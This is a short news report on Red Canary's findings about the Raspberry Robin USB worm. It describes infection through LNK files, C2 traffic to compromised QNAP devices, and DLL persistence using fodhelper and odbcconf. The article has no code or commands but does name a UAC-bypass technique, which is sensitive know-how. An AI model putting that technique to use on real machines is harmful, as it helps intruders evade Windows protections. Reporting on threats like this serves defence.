In short: Researchers have discovered a relatively new worm that infects Windows PCs through a compromised external hard drive. Although they have been using it for several months now and know how it works, they are not sure about its end result. Apart from the insidious nature of his work, his tasks at a later stage are still unknown.

- Advertisement -

Analysts of the “Red Canary” disclosed a malware activity cluster that uses a worm distributed via external USB drives. The malware uses the “QNAP worm,” which cyber intelligence company Sekoia described back in November 2021. However, Red Canary has found it in some of its customer technology and production networks and has been tracking it since September, codenamed Raspberry Robin.

- Advertisement -

Raspberry Robin spreads when users plug an infected USB drive into their computer. The worm, disguised as an LNK file, then uses Windows cmd.exe to launch the malicious file. It then uses the standard Microsoft installer (msiexec.exe) to connect to command and control (C2) servers—typically vulnerable QNAP devices. He then uses the TOR exit nodes to cover his tracks.

- Advertisement -

Red Canary suspects that Raspberry Robin establishes persistence by installing a malicious DLL file from C2 servers. The malware then launches the DLL using two utilities included with Windows: fodhelper (Windows settings manager) and obdcconf (ODBC driver configuration tool). The former bypasses User Account Control, while the latter executes and configures the DLL.

However, the researchers acknowledge that this is just a working hypothesis. They don’t know exactly what DLLs do, nor have they figured out how they are distributed to USB sticks.

“First of all, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely that this happens offline or otherwise outside of our line of sight,” Red Canary said. “We also don’t know why Raspberry Robin installs a malicious DLL.”

It is also unclear what the ultimate goal of the QNAP worm is. Other than how it works, the researchers didn’t see any “late-stage activity” that could benefit operators.

Image credit: red canary